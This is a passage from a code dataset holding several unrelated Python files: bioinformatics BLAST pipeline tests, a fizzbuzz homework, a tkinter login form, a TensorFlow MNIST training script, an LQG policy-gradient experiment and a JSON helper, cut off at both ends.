print(\"\\n\".join(q))\n print('a: ', a)\n #print(\"\\n\".join(a))\n\ndef check_many_to_one_consistent_format(qagenerator):\n nb_qa_pairs,nb_questions = 10,3\n qa_pair_list = qagenerator.generate_many_to_one_consistent_format(nb_qa_pairs,nb_questions)\n for q_list,a_consistent_format in qa_pair_list:\n print()\n print(\"\\n\".join(q_list))\n print('a: ', a_consistent_format)\n\nif __name__ == '__main__':\n qagenerator = QA_constraint()\n check_single_question(qagenerator)\n user_test.run_unit_test_for_user(QA_constraint)","sub_path":"math_taxonomy/physics/electricity_and_magnetism/resistance_of_conductor.py","file_name":"resistance_of_conductor.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"327312002","text":"#!/usr/bin/env python3\nfrom olctools.accessoryFunctions.accessoryFunctions import MetadataObject\nfrom genemethods.geneseekr.geneseekr import GeneSeekr\nfrom genemethods.geneseekr.blast import BLAST\nimport multiprocessing\nfrom glob import glob\nfrom time import time\nimport os\n\ntest_path = os.path.abspath(os.path.dirname(__file__))\n\n__author__ = 'adamkoziol'\n\n\ndef variables():\n v = MetadataObject()\n datapath = os.path.join(test_path, 'testdata')\n v.sequencepath = os.path.join(datapath, 'aa_sequences')\n v.targetpath = os.path.join(datapath, 'databases', 'resfinder')\n v.reportpath = os.path.join(datapath, 'reports')\n v.cutoff = 70\n v.evalue = '1E-05'\n v.align = False\n v.unique = False\n v.resfinder = False\n v.virulencefinder = False\n v.numthreads = multiprocessing.cpu_count()\n v.start = time()\n return v\n\n\ndef method_init(analysistype, program, align, unique):\n global var\n var = variables()\n var.analysistype = analysistype\n var.program = program\n var.align = align\n var.unique = unique\n method = BLAST(var)\n return method\n\n\ntblastn_method = method_init(analysistype='resfinder',\n program='tblastn',\n align=True,\n unique=True)\n\n\ndef test_parser():\n assert os.path.basename(tblastn_method.targets[0]) == 'beta-lactam.tfa'\n\n\ndef test_combined_files():\n assert os.path.isfile(tblastn_method.combinedtargets)\n\n\ndef test_strains():\n assert os.path.isfile(tblastn_method.strains[0])\n\n\ndef test_strain():\n assert os.path.basename(tblastn_method.strains[0]) == 'amr_test.fasta'\n\n\ndef test_makeblastdb():\n global geneseekr\n geneseekr = GeneSeekr()\n geneseekr.makeblastdb(fasta=tblastn_method.combinedtargets,\n program=tblastn_method.program)\n assert os.path.isfile(os.path.join(var.targetpath, 'combinedtargets.nsq'))\n\n\ndef test_variable_populate():\n global targetfolders\n global targetfiles\n global records\n targetfolders, targetfiles, records = \\\n geneseekr.target_folders(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype)\n\n\ndef test_targetfolders():\n assert os.path.basename(list(targetfolders)[0]) == 'resfinder'\n\n\ndef test_targetfiles():\n assert targetfiles[0] == tblastn_method.combinedtargets\n\n\ndef test_records():\n assert records[targetfiles[0]]['ampH_2_HQ586946']\n\n\ndef test_tblastn():\n global tblastn_report\n tblastn_method.metadata = geneseekr.run_blast(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n program=tblastn_method.program,\n outfmt=tblastn_method.outfmt,\n evalue=tblastn_method.evalue,\n num_threads=tblastn_method.cpus)\n tblastn_report = os.path.join(var.reportpath, 'amr_test_tblastn_resfinder.tsv')\n assert os.path.isfile(tblastn_report)\n\n\ndef test_enhance_report_parsing():\n geneseekr.parseable_blast_outputs(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n fieldnames=tblastn_method.fieldnames,\n program=tblastn_method.program)\n header = open(tblastn_report).readline()\n assert header.split('\\t')[0] == 'query_id'\n\n\ndef test_tblastn_results():\n with open(tblastn_report) as blast_results:\n next(blast_results)\n data = blast_results.readline()\n results = data.split('\\t')\n assert int(results[2]) >= 50\n\n\ndef test_blast_parse():\n tblastn_method.metadata = geneseekr.unique_parse_blast(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n fieldnames=tblastn_method.fieldnames,\n cutoff=tblastn_method.cutoff,\n program=tblastn_method.program)\n for sample in tblastn_method.metadata:\n assert sample.resfinder.queryranges['contig2'] == [[1, 264]]\n\n\ndef test_filter():\n tblastn_method.metadata = geneseekr.filter_unique(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype)\n for sample in tblastn_method.metadata:\n assert sample.resfinder.blastlist[0]['percentidentity'] >= 70\n\n\ndef test_dict_create():\n tblastn_method.metadata = geneseekr.dict_initialise(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype)\n for sample in tblastn_method.metadata:\n assert type(sample.resfinder.protseq) is dict\n\n\ndef test_report_creation():\n tblastn_method.metadata = geneseekr.resfinder_reporter(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n reportpath=tblastn_method.reportpath,\n align=tblastn_method.align,\n program=tblastn_method.program,\n targetpath=tblastn_method.targetpath,\n cutoff=tblastn_method.cutoff)\n\n\ndef test_report_existance():\n global geneseekr_report\n geneseekr_report = os.path.join(tblastn_method.reportpath, 'resfinder_tblastn.xlsx')\n assert os.path.isfile(geneseekr_report)\n\n\ndef test_report_row():\n for sample in tblastn_method.metadata:\n assert sorted(sample.resfinder.sampledata)[0][0] == 'blaOXA'\n\n\ndef test_parse_results():\n for sample in tblastn_method.metadata:\n assert sample.resfinder.blastresults['blaOXA_427_1_KX827604'] == 94.34\n\n\ndef test_aaseq():\n for sample in tblastn_method.metadata:\n assert sample.resfinder.blastlist[0]['query_sequence'][:5] == 'MSRIL'\n\n\ndef test_fasta_create():\n global fasta_file\n geneseekr.export_fasta(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n reportpath=tblastn_method.reportpath,\n cutoff=tblastn_method.cutoff,\n program=tblastn_method.program)\n fasta_file = os.path.join(var.reportpath, 'amr_test_resfinder.fasta')\n assert os.path.isfile(fasta_file)\n header = open(fasta_file, 'r').readline().rstrip()\n assert header == '>amr_test_blaOXA_427_1_KX827604'\n\n\ndef test_combined_targets_clean():\n os.remove(tblastn_method.combinedtargets)\n\n\ndef test_makeblastdb_clean():\n databasefiles = glob(os.path.join(var.targetpath, 'combinedtargets.n*'))\n for dbfile in databasefiles:\n os.remove(dbfile)\n\n\ndef test_remove_tblastn_report():\n os.remove(tblastn_report)\n\n\ndef test_remove_fasta_file():\n os.remove(fasta_file)\n\n\ndef test_remove_geneseekr_report():\n os.remove(geneseekr_report)\n\n\ndef test_remove_report_path():\n os.rmdir(tblastn_method.reportpath)\n","sub_path":"tests/test_tblastn.py","file_name":"test_tblastn.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"415122130","text":"\n\ndef get_ranges(list):\n list.append(0)\n n = \"\"\n low = 0\n for i in range (1,len(list)):\n if list[i] != list[i-1]+1:\n if list[low] == list[i-1]:\n n+=str(list[low]) + \" \"\n low = i\n else:\n n+=str(list[low]) + \"-\"+str(list[i-1]) + \" \"\n low = i\n list.pop()\n return n\n\nlist = [1,3,5,7,8,9,10,15]\nprint(get_ranges(list))\n\ndef fizzbuzz(number):\n if number % 3 == 0 and number % 5 == 0:\n return \"FizzBuzz\"\n elif number % 3 == 0:\n return \"fizz\"\n elif number % 5 == 0:\n return \"buzz\"\n else:\n return number\n\n\nfor i in range(100):\n print (fizzbuzz(i),end =\" \")\n\n\n","sub_path":"Tasks/Apekun_Tasks/HomeTask4/Homework4.py","file_name":"Homework4.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349601536","text":"from tkinter.ttk import *\r\nfrom tkinter import *\r\n\r\nbase = Tk()\r\nbase.title(\"you can write anything here \")\r\nbase.geometry(\"500x300\")\r\n\r\nlb1 = Label(base, text=\"Enter User ID\")\r\nlb1.grid(row=0, column=0)\r\n\r\nphoto = PhotoImage(file=r'C:\\Users\\Lenovo\\Downloads\\UIHere.png')\r\n\r\ntxt1 = Entry(base, width=15)\r\ntxt1.grid(row=0, column=1)\r\n\r\nlb2 = Label(base, text=\"Enter Password Here\")\r\nlb2.grid(row=1, column=0)\r\n\r\ntxt2 = Entry(base, width=15, show='*')\r\ntxt2.grid(row=1, column=1)\r\n\r\nbtn1 = Button(base, image=photo)\r\nbtn1['text'] = \"Save Data\"\r\nbtn1['font'] = (\"Arial Bold\", 15)\r\nbtn1.place(x=100, y=150)\r\n\r\nbtn2 = Button(base)\r\nbtn2.configure(text=\"Submit\", font=(\"Arial Bold\", 20))\r\nbtn2.place(x=200, y=120)\r\nbase.mainloop()","sub_path":"GUI_example2.py","file_name":"GUI_example2.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183493060","text":"import os\r\nimport time\r\nimport numpy as np\r\n\r\nimport tensorflow as tf\r\n\r\nfrom mnistreader import reader\r\nimport mnist\r\n\r\nFLAGS = None\r\n\r\n\r\nbatch_size=50\r\ndef placeholder_inputs(batch_size):\r\n images_placeholder = tf.placeholder(tf.float32, shape=(batch_size, 784))\r\n labels_placeholder = tf.placeholder(tf.int32, shape=(batch_size))\r\n return images_placeholder, labels_placeholder\r\n\r\n\r\ndef fill_feed_dict(data_set, images_pl, labels_pl):\r\n \"\"\"Fills the feed_dict for training the given step.\r\n\r\n A feed_dict takes the form of:\r\n feed_dict = {\r\n : ,\r\n ....\r\n }\r\n\r\n Args:\r\n data_set: The set of images and labels, from input_data.read_data_sets()\r\n images_pl: The images placeholder, from placeholder_inputs().\r\n labels_pl: The labels placeholder, from placeholder_inputs().\r\n\r\n Returns:\r\n feed_dict: The feed dictionary mapping from placeholders to values.\r\n \"\"\"\r\n # Create the feed_dict for the placeholders filled with the next\r\n # `batch size` examples.\r\n images_feed, labels_feed = data_set.next_batch(FLAGS.batch_size,\r\n FLAGS.fake_data)\r\n feed_dict = {\r\n images_pl: images_feed,\r\n labels_pl: labels_feed,\r\n }\r\n return feed_dict\r\n\r\n\r\ndef do_eval(sess, eval_correct,data_set,batch_size,images_placeholder,labels_placeholder,keep_prob):\r\n \"\"\"Runs one evaluation against the full epoch of data.\r\n\r\n Args:\r\n sess: The session in which the model has been trained.\r\n eval_correct: The Tensor that returns the number of correct predictions.\r\n images_placeholder: The images placeholder.\r\n labels_placeholder: The labels placeholder.\r\n data_set: The set of images and labels to evaluate, from\r\n input_data.read_data_sets().\r\n \"\"\"\r\n # And run one epoch of eval.\r\n true_count = 0 # Counts the number of correct predictions.\r\n steps_per_epoch = data_set.readlength // FLAGS.batch_size \r\n oldpointer= data_set.pointer\r\n data_set.pointer=data_set.readlength\r\n print(data_set.pointer)\r\n #steps_per_epoch = data_set.readlength // FLAGS.batch_size \r\n\r\n num_examples = steps_per_epoch * FLAGS.batch_size\r\n for step in xrange(steps_per_epoch):\r\n inputs,answers=data_set.list_tags(batch_size,test=False)\r\n feed_dict= {\r\n images_placeholder:inputs,\r\n labels_placeholder:answers,\r\n keep_prob:1\r\n }\r\n\r\n true_count += sess.run(eval_correct, feed_dict=feed_dict)\r\n precision = float(true_count) / num_examples\r\n print('fakeeval Num examples: %d Num correct: %d Precision @ 1: %0.04f' %\r\n (num_examples, true_count, precision))\r\n data_set.pointer=oldpointer\r\n\r\n\r\n\r\n\r\ndef do_evalfake(sess, eval_correct,data_set,batch_size,images_placeholder,labels_placeholder,logits,keep_prob):\r\n \"\"\"Runs one evaluation against the full epoch of data.\r\n\r\n Args:\r\n sess: The session in which the model has been trained.\r\n eval_correct: The Tensor that returns the number of correct predictions.\r\n images_placeholder: The images placeholder.\r\n labels_placeholder: The labels placeholder.\r\n data_set: The set of images and labels to evaluate, from\r\n input_data.read_data_sets().\r\n \"\"\"\r\n # And run one epoch of eval.\r\n true_count = 0 # Counts the number of correct predictions.\r\n steps_per_epoch = data_set.readlength // FLAGS.batch_size // 6\r\n oldpointer= data_set.pointer\r\n data_set.pointer=data_set.readlength *5 //6\r\n \r\n #steps_per_epoch = data_set.readlength // FLAGS.batch_size \r\n\r\n num_examples = steps_per_epoch * FLAGS.batch_size\r\n for step in xrange(steps_per_epoch):\r\n # print('pointer1:',data_set.pointer)\r\n inputs,answers=data_set.list_tags(batch_size,test=True)\r\n feed_dict= {\r\n images_placeholder:inputs,\r\n labels_placeholder:answers,\r\n keep_prob:0.5\r\n }\r\n\r\n newcount,logi=sess.run([eval_correct,logits], feed_dict=feed_dict)\r\n true_count += newcount\r\n for i0 in range(FLAGS.batch_size):\r\n lgans=np.argmax(logi[i0])\r\n for i0 in range(FLAGS.batch_size):\r\n lgans=np.argmax(logi[i0])\r\n if(lgans!=answers[i0] and False):\r\n for tt in range(784):\r\n if(tt%28==0): print(' ');\r\n if(inputs[i0][tt]!=0):\r\n print('1',end=' ');\r\n else:\r\n print('0',end=' ');\r\n# print('np',np.argmax(i),answers,answers[i0],'np')\r\n print(lgans,answers[i0])\r\n # Update the events file.\r\n precision = float(true_count) / num_examples\r\n print('Num examples: %d Num correct: %d Precision @ 1: %0.04f' %\r\n (num_examples, true_count, precision),end='')\r\n data_set.pointer=oldpointer\r\n #print('pointer2:',data_set.pointer)\r\n\r\n\r\n\r\ndef run_training():\r\n \"\"\"Train MNIST for a number of steps.\"\"\"\r\n # Get the sets of images and labels for training, validation, and\r\n # test on MNIST.\r\n data_sets=reader(patchlength=0,\\\r\n maxlength=300,\\\r\n embedding_size=100,\\\r\n num_verbs=10,\\\r\n allinclude=False,\\\r\n shorten=False,\\\r\n shorten_front=False,\\\r\n testflag=False,\\\r\n passnum=0,\\\r\n dpflag=False)\r\n\r\n \r\n \r\n\r\n # Tell TensorFlow that the model will be built into the default Graph.\r\n with tf.Graph().as_default():\r\n # Generate placeholders for the images and labels.\r\n images_placeholder, labels_placeholder = placeholder_inputs(\r\n FLAGS.batch_size)\r\n\r\n # Build a Graph that computes predictions from the inference model.\r\n logits,keep_prob = mnist.inference(images_placeholder,\r\n FLAGS.hidden1,\r\n FLAGS.hidden2)\r\n\r\n # Add to the Graph the Ops for loss calculation.\r\n loss = mnist.loss(logits, labels_placeholder)\r\n\r\n # Add to the Graph the Ops that calculate and apply gradients.\r\n train_op = mnist.training(loss, FLAGS.learning_rate)\r\n\r\n # Add the Op to compare the logits to the labels during evaluation.\r\n eval_correct = mnist.evaluation(logits, labels_placeholder)\r\n\r\n # Build the summary Tensor based on the TF collection of Summaries.\r\n summary = tf.summary.merge_all()\r\n\r\n # Add the variable initializer Op.\r\n init = tf.global_variables_initializer()\r\n\r\n # Create a saver for writing training checkpoints.\r\n saver = tf.train.Saver()\r\n\r\n # Create a session for running Ops on the Graph.\r\n sess = tf.Session()\r\n\r\n # Instantiate a SummaryWriter to output summaries and the Graph.\r\n summary_writer = tf.summary.FileWriter(FLAGS.log_dir, sess.graph)\r\n\r\n # And then after everything is built:\r\n\r\n # Run the Op to initialize the variables.\r\n with tf.Session() as session:\r\n sess.run(init)\r\n if True:\r\n model_file=tf.train.latest_checkpoint(FLAGS.log_dir)\r\n saver.restore(sess,model_file)\r\n\r\n # Start the training loop.\r\n start_time = time.time()\r\n for step in xrange(FLAGS.max_steps):\r\n\r\n # Fill a feed dictionary with the actual set of images and labels\r\n # for this particular training step.\r\n\r\n \r\n inputs,answers=data_sets.list_tags(FLAGS.batch_size,test=False)\r\n# print(len(inputs),len(inputs[0]),inputs[0])\r\n# input()\r\n inputs2=[]\r\n for i in range(len(inputs)):\r\n inputs2.append(inputs[i]/255)\r\n# print(len(inputs2),len(inputs2[0]),inputs2[0])\r\n# input()\r\n feed_dict = {\r\n images_placeholder: inputs2,\r\n labels_placeholder: answers,\r\n keep_prob:0.5\r\n }\r\n # Run one step of the model. The return values are the activations\r\n # from the `train_op` (which is discarded) and the `loss` Op. To\r\n # inspect the values of your Ops or variables, you may include them\r\n # in the list passed to sess.run() and the value tensors will be\r\n # returned in the tuple from the call.\r\n _, loss_value,logi = sess.run([train_op, loss,logits],\r\n feed_dict=feed_dict)\r\n\r\n duration = time.time() - start_time\r\n\r\n # Write the summaries and print an overview fairly often.\r\n if step % 100 == 0:\r\n # Print status to stdout.\r\n print('Step %d: loss = %.2f (%.3f sec)' % (step, loss_value, duration))\r\n# print(logi)\r\n# print(answers)\r\n for i0 in range(FLAGS.batch_size):\r\n lgans=np.argmax(logi[i0])\r\n if(lgans!=answers[i0] and False):\r\n for tt in range(784):\r\n if(tt%28==0): print(' ');\r\n if(inputs[i0][tt]!=0):\r\n print('1',end=' ');\r\n else:\r\n print('0',end=' ');\r\n# print('np',np.argmax(i),answers,answers[i0],'np')\r\n print(lgans,answers[i0])\r\n # Update the events file.\r\n summary_str = sess.run(summary, feed_dict=feed_dict)\r\n summary_writer.add_summary(summary_str, step)\r\n summary_writer.flush()\r\n if (step + 1) % 500 == 0 or (step + 1) == FLAGS.max_steps:\r\n #print('Training Data Eval:')\r\n do_eval(sess,\r\n eval_correct,data_sets,FLAGS.batch_size,\r\n images_placeholder,\r\n labels_placeholder,keep_prob)\r\n do_evalfake(sess,\r\n eval_correct,data_sets,FLAGS.batch_size,\r\n images_placeholder,\r\n labels_placeholder,\r\n logits,keep_prob)\r\n # Save a checkpoint and evaluate the model periodically.\r\n #if (step + 1) % 1000 == 0 or (step + 1) == FLAGS.max_steps:\r\n checkpoint_file = os.path.join(FLAGS.log_dir, 'model.ckpt')\r\n saver.save(sess, checkpoint_file, global_step=step)\r\n print('saved to',checkpoint_file)\r\n '''\r\n # Evaluate against the training set.\r\n print('Training Data Eval:')\r\n do_eval(sess,\r\n eval_correct,\r\n images_placeholder,\r\n labels_placeholder,\r\n data_sets.train)\r\n # Evaluate against the validation set.\r\n print('Validation Data Eval:')\r\n do_eval(sess,\r\n eval_correct,\r\n images_placeholder,\r\n labels_placeholder,\r\n data_sets.validation)\r\n # Evaluate against the test set.\r\n print('Test Data Eval:')\r\n do_eval(sess,\r\n eval_correct,\r\n images_placeholder,\r\n labels_placeholder,\r\n data_sets.test)\r\n '''\r\n\r\ndef main(_):\r\n# if tf.gfile.Exists(FLAGS.log_dir):\r\n# tf.gfile.DeleteRecursively(FLAGS.log_dir)\r\n# tf.gfile.MakeDirs(FLAGS.log_dir)\r\n run_training()\r\n\r\n\r\nif __name__ == '__main__':\r\n tf.app.run()\r\n","sub_path":"fully_connected_feed2long.py","file_name":"fully_connected_feed2long.py","file_ext":"py","file_size_in_byte":11227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"223530258","text":"import numpy as np\nimport scipy as sp\nfrom IPython import embed\nimport argparse\n\nclass ADAM(object):\n def __init__(self, dx, lr = None):\n self.dx = dx\n self.beta1 = 0.9\n self.beta2 = 0.999\n self.m = np.zeros(self.dx)\n self.v = np.zeros(self.dx)\n if lr is None: \n self.alpha = 0.001\n else:\n self.alpha = lr\n self.t = 0\n self.epislon = 1e-8\n\n def update(self, theta, grad, alpha = None):\n self.t += 1\n self.m = (1.-self.beta1)*grad + self.beta1*self.m\n self.v = (1.-self.beta2)*(grad**2) + self.beta2*self.v\n hat_m = self.m / (1. - self.beta1**self.t)\n hat_v = self.v / (1. - self.beta2**self.t)\n if alpha is None:\n return theta - self.alpha*hat_m/(np.sqrt(hat_v) + self.epislon)\n else:\n return theta - alpha*hat_m/(np.sqrt(hat_v) + self.epislon)\n\nclass PlainGD(object):\n def __init__(self, dx, lr = None):\n self.dx = dx\n \n def update(self, theta, grad, alpha):\n return theta - alpha * grad\n\nclass LQG_env(object):\n def __init__(self, method_name):\n\n self.method_name = method_name\n\n self.A = np.zeros((3,3))\n self.A[0,0] = 1.01\n self.A[0,1] = 0.01\n self.A[1,0] = 0.01\n self.A[1,1] = 1.01\n self.A[1,2] = 0.01\n self.A[2,1] = 0.01\n self.A[2,2] = 1.01\n\n self.B = np.eye(3)\n self.Q = 1e-3*np.eye(3)\n self.R = np.eye(3)\n\n self.dx = 3\n self.du = 3\n\n self.init_state_mean = np.ones(self.dx)*5\n self.init_state_cov = np.eye(self.dx)*0.1\n\n self.state = None\n\n self.noise_cov = np.eye(self.dx)*0.001 \n\n self.K = 1e-3*np.random.randn(self.du, self.dx) #np.zeros((3,3)) #u = Kx\n self.P_K = None\n \n self.gamma = 0.998\n\n self.ADAM_optimizer = ADAM(dx = self.dx*self.du, lr = None)\n #self.Plain_GD = PlainGD(dx = self.dx*self.du)\n\n\n def reset(self):\n self.state = np.random.multivariate_normal(mean = self.init_state_mean, cov = self.init_state_cov)\n return self.state\n\n def step(self, x, u):\n cost = x.dot(self.Q).dot(x) + u.dot(self.R).dot(u)\n next_state = self.A.dot(x) + self.B.dot(u)\n next_state += np.random.multivariate_normal(mean = np.zeros(self.dx), cov = self.noise_cov)\n return next_state, cost, False\n\n def Fixed_point_iteration_Raccati_optimal_equation(self, max_iter):\n max_iter = int(max_iter)\n P_K = np.zeros((self.dx, self.dx))\n current_P_K = np.zeros((self.dx, self.dx))\n #max_iter = 200\n for i in range(2*max_iter):\n new_P_K = (self.Q + self.A.T.dot(current_P_K).dot(self.A) - \n self.A.T.dot(current_P_K).dot(self.B).dot(np.linalg.inv(self.B.T.dot(current_P_K).dot(self.B)+self.R)).dot(self.B.T).dot(current_P_K).dot(self.A))\n if np.linalg.norm(new_P_K - current_P_K) < 1e-5:\n break;\n current_P_K = np.copy(new_P_K)\n self.P_K = np.copy(current_P_K)\n \n def optimal_K(self):\n self.Fixed_point_iteration_Raccati_optimal_equation(max_iter = 500)\n self.K = -np.linalg.inv(self.B.T.dot(self.P_K).dot(self.B) + self.R).dot(self.B.T).dot(self.P_K).dot(self.A)\n\n def Fixed_point_iteration_Raccati_equation(self, max_iter):\n max_iter = int(max_iter)\n P_K = np.zeros((self.dx, self.dx))\n current_P_K = np.zeros((self.dx, self.dx))\n #max_iter = 200\n for i in range(2*max_iter):\n new_P_K = self.Q + self.K.T.dot(self.R).dot(self.K) + self.gamma*(self.A+self.B.dot(self.K)).T.dot(current_P_K).dot(self.A+self.B.dot(self.K))\n if np.linalg.norm(new_P_K - current_P_K) < 1e-5:\n break;\n current_P_K = np.copy(new_P_K)\n self.P_K = np.copy(current_P_K)\n\n def Jacobian_with_vectorized_K(self, x):\n dim_K = self.du*self.dx\n J = np.zeros((self.du, dim_K))\n for i in range(self.du):\n J[i, i*self.dx:i*self.dx+self.dx] = x\n return J\n\n def empircal_off_policy_gradient(self, xs):\n batch_size = xs.shape[0]\n us = (self.K.dot(xs.T)).T #u = Kx\n grad_vectorized_K = np.zeros(self.dx*self.du)\n for i in range(xs.shape[0]):\n g_u = 2*self.R.dot(us[i]) + 2*self.gamma*self.B.T.dot(self.P_K).dot(self.A.dot(xs[i])+self.B.dot(us[i]))\n grad_vectorized_K += self.Jacobian_with_vectorized_K(xs[i]).T.dot(g_u) \n return grad_vectorized_K/(batch_size*1.)\n \n def empircal_off_policy_newton_gradient(self, xs):\n batch_size = xs.shape[0]\n us = (self.K.dot(xs.T)).T #u = Kx\n HinvGrad_vecotirzed_K = np.zeros(self.dx*self.du)\n H_u = 2*self.R + 2*self.gamma*self.B.T.dot(self.P_K).dot(self.B)\n for i in range(xs.shape[0]):\n g_u = 2*self.R.dot(us[i]) + 2*self.gamma*self.B.T.dot(self.P_K).dot(self.A.dot(xs[i])+self.B.dot(us[i])) \n HinvGrad_vecotirzed_K += self.Jacobian_with_vectorized_K(xs[i]).T.dot(np.linalg.lstsq(a = H_u + 1e-3*np.eye(self.dx), b = g_u, rcond=-1)[0])\n return HinvGrad_vecotirzed_K/(batch_size*1)\n\n def empircal_off_policy_natural_gradient(self, xs, kl_threshold):\n batch_size = xs.shape[0]\n off_policy_grad = self.empircal_off_policy_gradient(xs)\n JpJ = np.zeros((self.dx*self.du, self.dx*self.du))\n for i in range(xs.shape[0]):\n J = self.Jacobian_with_vectorized_K(xs[i])\n JpJ += J.T.dot(J)\n JpJ /= batch_size\n \n natural_grad = np.linalg.lstsq(a = JpJ + 1e-3*np.eye(JpJ.shape[0]), b = off_policy_grad, rcond = -1)[0]\n #print np.linalg.norm(off_policy_grad), np.linalg.norm(natural_grad)\n #compute learning_rate too:\n natural_grad_lr = np.sqrt(kl_threshold/(off_policy_grad.dot(natural_grad)+1e-7))\n return natural_grad,natural_grad_lr\n\n def empircal_off_policy_natural_newton(self, xs, kl_threshold):\n batch_size = xs.shape[0]\n off_policy_newton = self.empircal_off_policy_newton_gradient(xs)\n JpJ = np.zeros((self.dx*self.du, self.dx*self.du))\n for i in range(xs.shape[0]):\n J = self.Jacobian_with_vectorized_K(xs[i])\n JpJ += J.T.dot(J)\n JpJ /= batch_size\n \n natural_newton = np.linalg.lstsq(a = JpJ + 1e-3*np.eye(JpJ.shape[0]), b = off_policy_newton, rcond=-1)[0]\n #compute learning_rate too:\n natural_newton_lr = np.sqrt(kl_threshold/(off_policy_newton.dot(natural_newton)+1e-7))\n return natural_newton,natural_newton_lr\n \n def plain_gradient_descent(self, xs, batch_size = 64, lr = None):\n #sample: \n #xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n #approximately compute P_K based on the current K:\n self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n #compute plain \"DPG\":\n vectorized_grad = self.empircal_off_policy_gradient(xs = xs)\n vectorized_grad = vectorized_grad/np.linalg.norm(vectorized_grad)\n #print np.linalg.norm(vectorized_grad)\n #[U,S] = np.linalg.eig(self.P_K)\n \n vectorized_new_K = self.ADAM_optimizer.update(theta = self.K.reshape(self.du*self.dx), grad = vectorized_grad, alpha = lr)\n #vectorized_new_K = self.Plain_GD.update(theta = self.K.reshape(self.du*self.dx), grad = vectorized_grad, alpha = lr)\n self.K = np.reshape(vectorized_new_K, (self.du, self.dx))\n \n def natural_gradient_descent(self, xs, batch_size = 64, kl_threshold = 0.001):\n #xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n #approximately compute P_K based on the current K:\n self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n vectorized_nat_grad, nat_grad_lr = self.empircal_off_policy_natural_gradient(xs = xs, kl_threshold = kl_threshold)\n #print np.linalg.norm(vectorized_nat_grad), nat_grad_lr\n vectorized_new_K = self.K.reshape(self.du*self.dx) - nat_grad_lr*vectorized_nat_grad\n self.K = np.reshape(vectorized_new_K, (self.du, self.dx))\n \n def natural_newton_descent(self, xs, batch_size = 64, kl_threshold = 0.001):\n #xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n #approximately compute P_K based on the current K:\n self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n vectorized_nat_newton, nat_newton_lr = self.empircal_off_policy_natural_newton(xs = xs, kl_threshold = kl_threshold)\n vectorized_new_K = self.K.reshape(self.du*self.dx) - nat_newton_lr*vectorized_nat_newton\n self.K = np.reshape(vectorized_new_K, (self.du, self.dx))\n\n def exact_evaluate(self):\n #evaluate the off-policy objective with the current K.\n #obtain P_K:\n self.Fixed_point_iteration_Raccati_equation(max_iter = 1./(1-self.gamma))\n return self.init_state_mean.dot(self.P_K).dot(self.init_state_mean) + np.trace(self.P_K.dot(self.init_state_cov)) #+ np.trace(self.P_K.dot(self.noise_cov))\n\n def train(self, epoch = 200, batch_size = 64, lr_or_KL = 0.001):\n epoch_cost = []\n for e in range(epoch):\n #evaluate:\n curr_cost = self.exact_evaluate()\n print ('at epoch {0}, the current policy has cost {1}'.format(e, curr_cost))\n epoch_cost.append(curr_cost)\n\n xs = np.random.multivariate_normal(self.init_state_mean, self.init_state_cov, size = batch_size)\n if self.method_name == 'Plain GD':\n self.plain_gradient_descent(xs, batch_size=batch_size, lr = lr_or_KL)\n elif self.method_name == 'Natural GD':\n self.natural_gradient_descent(xs = xs, batch_size= batch_size, kl_threshold=lr_or_KL)\n elif self.method_name == 'Newton Natural GD':\n self.natural_newton_descent(xs = xs, batch_size=batch_size, kl_threshold=lr_or_KL)\n \n return epoch_cost\n\n def rollout(self, T = 100):\n x = np.random.multivariate_normal(mean = self.init_state_mean, cov = self.init_state_cov, size = 1)[0]\n traj_x = []\n traj_a = []\n traj_c = []\n for t in range(T):\n a = self.K.dot(x)\n traj_x.append(x)\n traj_a.append(a)\n x, c, done = self.step(x = x, u = a)\n traj_c.append(c)\n \n return traj_x, traj_a, traj_c\n \n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--seed', help='RNG seed', type=int, default=1337)\n parser.add_argument('--alg', type=str, default='Natural_GD') \n args = parser.parse_args()\n np.random.seed(args.seed)\n method_name = args.alg.replace(\"_\", \" \") #it also supports Natural GD and Newton Natural GD\n model = LQG_env(method_name = method_name) \n epoches_costs = model.train(epoch = 50, batch_size = 64, lr_or_KL=1e-3)\n\n\n \n \n\n","sub_path":"baselines/ddpg/LQG_model.py","file_name":"LQG_model.py","file_ext":"py","file_size_in_byte":11156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"528900092","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 22 17:28:25 2018\n\n@author: xavier\n\"\"\"\nimport json\n\n### =========================================================================================\n### ***** Ecrire les données dans un fichier json *****\n### =========================================================================================\n\n# transcrit en string json \ndef to_json(jsonable_structure):\n return json.dumps(jsonable_structure, ensure_ascii=False, indent=0)\n\n# écrit une string dans le fichier file_name\ndef json_to_file(jsonable_structure, file_name):\n with open(file_name, 'w') as f:\n f.write(to_json(jsonable_structure))\n f.close()\n\n### =========================================================================================\n### ***** Récupérer les données depuis un fichier json 